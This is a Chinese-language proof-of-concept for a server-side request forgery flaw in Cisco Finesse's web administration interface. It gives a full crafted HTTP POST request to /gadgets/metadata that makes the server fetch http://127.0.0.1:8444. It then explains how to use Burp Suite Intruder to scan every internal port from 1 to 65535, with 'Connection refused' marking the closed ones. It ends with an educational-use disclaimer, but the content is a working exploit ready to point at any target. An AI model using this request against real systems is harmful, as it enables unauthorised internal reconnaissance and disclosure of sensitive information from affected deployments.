Cisco Finesse 基于 Web 的管理界面存在一个漏洞,可能允许未经身份验证的远程攻击者对受影响的系统发动 SSRF 攻击。
该漏洞是由于对发送至受影响系统的特定 HTTP 请求中用户提供的输入验证不足所致。攻击者可通过向受影响设备发送特制 HTTP 请求来利用此漏洞。成功利用后,攻击者能够获取与受影响设备相关联的服务中的有限敏感信息。
<target> 替换为你的目标,以检查服务器本地主机上端口号 "8444" 的响应。POST /gadgets/metadata HTTP/2
Host: <target>:8445
Cookie: timeBeforeFailover=1695808242310; timeBeforeAttemptingLoginInIframe=1695808244317; attemptsMade=1; seqNumberGenerated=1; finesse_ag_extension=<extension>; activeDeviceId4000=SEPD4AD717A03F6; timeBeforeLoadingOtherSide=1695808249678
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://<target>:8445/desktop/container;jsessionid=90aE172355707490406528141464742B/?locale=en_US
Content-Type: application/json
Content-Length: 127
Origin: https://<target>:8445
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
{"context":{"container":"default","language":"en","country":"US","locale":"en_US"},"gadgets":[{"url":"http://127.0.0.1:8444"}]}

使用 Burp Suite Intruder 扫描 Cisco Finesse 基于 Web 的管理服务器上的所有开放端口,将端口号范围从 1 更改为 65535。
你会在关闭的端口上看到 "Connection refused" 响应。


这只是一个概念验证 (PoC),用于证明 Cisco Finesse 基于 Web 的管理界面容易受到服务器端请求伪造 (SSRF) 攻击,且此 PoC 仅用于教育目的。请负责任地使用,并仅在获得明确测试许可的系统上使用。滥用此 PoC 可能导致严重后果。